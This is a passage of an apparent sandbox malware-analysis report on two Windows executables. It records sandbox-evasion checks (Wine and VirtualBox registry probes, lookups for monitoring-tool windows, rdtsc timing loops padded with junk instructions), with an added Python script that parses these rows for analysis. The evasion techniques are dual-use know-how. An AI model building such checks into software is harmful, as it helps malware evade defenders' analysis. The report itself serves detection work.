Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
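Three evasion checks are recorded in this section. The "Window searched" rows earlier in the report are window-class lookups for Filemon, Regmon and Process Monitor; the "File opened" rows just above probe registry keys that only exist under Wine (`HKEY_CURRENT_USER\Software\Wine`) or on a VirtualBox guest (the `VBOX__` ACPI DSDT table under `HKLM\HARDWARE`); and the "RDTSC instruction interceptor" rows that follow are pairs of `rdtsc` reads separated by push/pop and conditional-jump padding, so that the cycle delta between them can be compared with a threshold that a hypervisor trapping `rdtsc` will exceed. Those interceptor rows also chain: each row's second address is the next row's first address, which means the sandbox is stepping through one long run of back-to-back reads. The script below is an added example, not part of this report or of the sandbox; it parses rows copied from this page, groups the probes per process, counts the padding between each pair of reads and rebuilds the chains. The row regexes are the example's own assumptions about the report format.

```python
import re
from collections import defaultdict

# Rows copied from this report's evasion tables (Window searched, File opened, RDTSC instruction
# interceptor); the selection and ordering are the example's own.
SAMPLE = r"""
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC0B second address: 6DEC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC0F second address: 6DEC19 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC19 second address: 6DEC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC1F second address: 6DEC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84C54A second address: 84C54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84C54E second address: 84C558 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
"""

WINDOW_RE = re.compile(r"^Source: (?P<proc>\S+) Window searched: window name: (?P<name>\S+)")
REGISTRY_RE = re.compile(r"^Source: (?P<proc>\S+) File opened: (?P<key>HKEY_\S+)")
RDTSC_RE = re.compile(r"^Source: (?P<proc>\S+) RDTSC instruction interceptor: First address: "
                      r"(?P<first>[0-9A-Fa-f]+) second address: (?P<second>[0-9A-Fa-f]+) instructions: (?P<ins>.*)$")
OFFSET_RE = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")   # "0x00000002 pop edx" -> "pop edx"


def parse_evasion(text: str) -> dict:
    """Per process: window classes and registry keys probed, plus each intercepted rdtsc pair with
    the instructions executed between the two reads (the padding that keeps the delta non-trivial)."""
    out = defaultdict(lambda: {"windows": set(), "registry": set(), "rdtsc": []})
    for line in text.splitlines():
        if m := WINDOW_RE.match(line):
            out[m["proc"]]["windows"].add(m["name"])
        elif m := REGISTRY_RE.match(line):
            out[m["proc"]]["registry"].add(m["key"])
        elif m := RDTSC_RE.match(line):
            ins = [t for t in OFFSET_RE.split(m["ins"]) if t]
            reads = [i for i, t in enumerate(ins) if t == "rdtsc"]
            junk = ins[reads[0] + 1:reads[-1]] if len(reads) >= 2 else []
            out[m["proc"]]["rdtsc"].append({"first": m["first"].upper(), "second": m["second"].upper(),
                                            "reads": len(reads), "junk": junk})
    return dict(out)


def rdtsc_chains(records: list) -> list:
    """Link pairs whose second address is the next pair's first address. One chain is one run of
    consecutive timing reads the sandbox stepped through; its length is how many rdtsc
    executions a single check burns."""
    nxt = {r["first"]: r["second"] for r in records}
    chains = []
    for head in (a for a in nxt if a not in nxt.values()):
        chain = [head]
        while chain[-1] in nxt and len(chain) <= len(nxt):   # bound guards against cycles
            chain.append(nxt[chain[-1]])
        chains.append(chain)
    return chains


def summarize(text: str) -> dict:
    return {
        proc: {
            "windows": sorted(d["windows"]),
            "registry": sorted(d["registry"]),
            "rdtsc_pairs": len(d["rdtsc"]),
            "max_junk_between_reads": max((len(r["junk"]) for r in d["rdtsc"]), default=0),
            "chains": rdtsc_chains(d["rdtsc"]),
        }
        for proc, d in parse_evasion(text).items()
    }


if __name__ == "__main__":
    for proc, info in summarize(SAMPLE).items():
        print(proc)
        for key, value in info.items():
            print(f"  {key}: {value}")
```

The padding between reads is only a handful of stack operations and jumps, so on bare metal the delta stays small; the check fires when single-stepping or a trapped `rdtsc` stretches it. Note that `explorti.exe` also probes lower-cased variants (`Regmonclass`, `Filemonclass`), so a window-class match list should compare case-insensitively.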
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC0B second address: 6DEC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC0F second address: 6DEC19 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC19 second address: 6DEC1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 6DEC1F second address: 6DEC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84C54A second address: 84C54E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84C54E second address: 84C558 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84C558 second address: 84C55D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 84C55D second address: 84C572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jo 00007FBF8C4F2092h 0x0000000d jnc 00007FBF8C4F2086h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860A28 second address: 860A2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860B95 second address: 860BA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860BA2 second address: 860BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860D04 second address: 860D08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860E62 second address: 860E84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A57h 0x00000009 js 00007FBF8C4F2A46h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860E84 second address: 860E89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860E89 second address: 860E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860FD5 second address: 860FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860FD9 second address: 860FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 860FDF second address: 860FE4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8641C1 second address: 8641C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8641C5 second address: 8641CB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8641CB second address: 86420A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A58h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov edi, dword ptr [ebp+122D1E69h] 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D3A9Bh], edi 0x00000018 mov dword ptr [ebp+122D1C10h], edi 0x0000001e call 00007FBF8C4F2A49h 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 86420A second address: 864211 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864211 second address: 864217 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864217 second address: 864236 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FBF8C4F2094h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864236 second address: 864240 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FBF8C4F2A46h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864240 second address: 864251 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864337 second address: 86433B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 86433B second address: 864345 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864459 second address: 864473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A56h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864473 second address: 864496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e jg 00007FBF8C4F2086h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 864496 second address: 8644C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FBF8C4F2A58h 0x00000008 push eax 0x00000009 pop eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8644C0 second address: 8644FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop edi 0x00000009 popad 0x0000000a pop eax 0x0000000b jmp 00007FBF8C4F208Bh 0x00000010 lea ebx, dword ptr [ebp+12459045h] 0x00000016 or dx, 077Ah 0x0000001b xchg eax, ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e je 00007FBF8C4F2099h 0x00000024 jmp 00007FBF8C4F2093h 0x00000029 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8644FD second address: 864503 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8645B7 second address: 8645BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 874F28 second address: 874F2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 859A9F second address: 859AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 859AA3 second address: 859ACF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A50h 0x00000007 jl 00007FBF8C4F2A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 push edi 0x00000012 jnp 00007FBF8C4F2A46h 0x00000018 pop edi 0x00000019 jng 00007FBF8C4F2A4Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 859ACF second address: 859ADA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8832E7 second address: 883318 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007FBF8C4F2A4Fh 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FBF8C4F2A4Fh 0x00000015 jnc 00007FBF8C4F2A46h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883454 second address: 88345F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 88345F second address: 883465 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883465 second address: 883469 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883716 second address: 88374F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A54h 0x00000007 jp 00007FBF8C4F2A46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FBF8C4F2A57h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8838A3 second address: 8838B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007FBF8C4F2086h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8838B0 second address: 8838D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007FBF8C4F2A53h 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pop edi 0x00000011 jno 00007FBF8C4F2A46h 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883BC8 second address: 883BCC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883BCC second address: 883BF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A4Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edi 0x0000000c pushad 0x0000000d popad 0x0000000e pop edi 0x0000000f popad 0x00000010 jc 00007FBF8C4F2A8Bh 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883BF0 second address: 883C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2095h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FBF8C4F2086h 0x00000011 jmp 00007FBF8C4F2094h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883D6E second address: 883DAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jns 00007FBF8C4F2A4Ch 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007FBF8C4F2A57h 0x0000001a pop esi 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 883F3B second address: 883F59 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FBF8C4F2086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jbe 00007FBF8C4F208Ah 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 jg 00007FBF8C4F2086h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 884589 second address: 8845A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FBF8C4F2A56h 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8845A5 second address: 8845C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F208Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007FBF8C4F208Dh 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 892004 second address: 89200A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A0457 second address: 8A0473 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FBF8C4F2A50h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FBF8C4F2A4Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A0473 second address: 8A0503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007FBF8C4F2088h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 pushad 0x00000023 mov esi, dword ptr [ebp+122D234Ch] 0x00000029 xor ecx, dword ptr [ebp+122D36AFh] 0x0000002f popad 0x00000030 push dword ptr fs:[00000000h] 0x00000037 jmp 00007FBF8C4F2093h 0x0000003c mov dword ptr fs:[00000000h], esp 0x00000043 call 00007FBF8C4F2093h 0x00000048 or edi, 29B56E50h 0x0000004e pop ebx 0x0000004f mov eax, dword ptr [ebp+122D0135h] 0x00000055 mov dword ptr [ebp+122D3798h], edi 0x0000005b push FFFFFFFFh 0x0000005d mov edi, dword ptr [ebp+122D2B27h] 0x00000063 push eax 0x00000064 pushad 0x00000065 ja 00007FBF8C4F2088h 0x0000006b push eax 0x0000006c push edx 0x0000006d push edx 0x0000006e pop edx 0x0000006f rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89E3D5 second address: 89E3DB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 89E3DB second address: 89E407 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FBF8C4F2099h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jo 00007FBF8C4F208Ch 0x00000013 jbe 00007FBF8C4F2086h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A16F2 second address: 8A16FB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A16FB second address: 8A1701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A36C3 second address: 8A36C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A4660 second address: 8A4665 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A4665 second address: 8A469B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FBF8C4F2A4Bh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007FBF8C4F2A57h 0x00000014 jne 00007FBF8C4F2A46h 0x0000001a popad 0x0000001b push ecx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\GHCGDAFCFH.exe RDTSC instruction interceptor: First address: 8A563D second address: 8A5641 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
